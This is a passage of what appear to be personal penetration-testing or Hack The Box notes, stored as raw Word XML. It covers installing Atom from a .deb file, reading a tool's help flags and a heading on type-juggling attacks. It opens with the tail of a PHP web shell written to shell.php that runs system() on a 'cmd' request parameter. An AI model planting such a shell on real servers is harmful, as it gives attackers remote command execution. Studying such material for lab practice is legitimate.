      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        system($_GET['cmd'] . ' 2&gt;&amp;1');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003751">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003752">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003753">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003754">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003755">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003756">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003757">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003758">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name of the file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003759">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You would paste this and it would run as one line</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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5E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p1npxuqdlkh4" w:id="503"/>
      <w:bookmarkEnd w:id="503"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install an application as a .deb file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000375F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003760">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I wanted to install atom, but it wasn't working so I decided to install it as a .deb file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003761">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the atom-amd64.deb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003762">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd ~/Downloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003763">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ./atom-amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it's done!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003765">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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67">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9gsaeib8hvj0" w:id="504"/>
      <w:bookmarkEnd w:id="504"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to read the "help" output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003768">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003769">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to read help menu (-h or --help)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3721100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="480" name="image460.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image460.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117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376C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, for this perl application, I see a bunch of "+" at the end of each flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A flag ending with + means this option requires an argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A flag without + means it’s just a toggle (true/false).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000376F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="492"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So for example, for authentication, you do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-auth michael:password123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003770">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003771">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="294" name="image305.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image305.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117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3772">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003773">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5235750" cy="4262438"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="408" name="image398.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image398.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1177"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5235750" cy="4262438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003774">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4681538" cy="3844015"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="521" name="image515.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image515.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1178"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4681538" cy="3844015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003775">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4776788" cy="3960560"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="243" name="image242.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image242.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1179"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4776788" cy="3960560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003776">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4757738" cy="4284117"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="304" name="image291.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image291.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1180"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4757738" cy="4284117"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003777">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5110163" cy="3365828"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="425" name="image419.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image419.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1181"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5110163" cy="3365828"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003778">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003779">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iersxlr1ke5b" w:id="505"/>
      <w:bookmarkEnd w:id="505"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Attack Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000377F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ejnqrc1pz576" w:id="506"/>
      <w:bookmarkEnd w:id="506"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET to POST and type juggling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003780">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003781">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Random HTB</w:t>
      </w:r>
    </w:p>
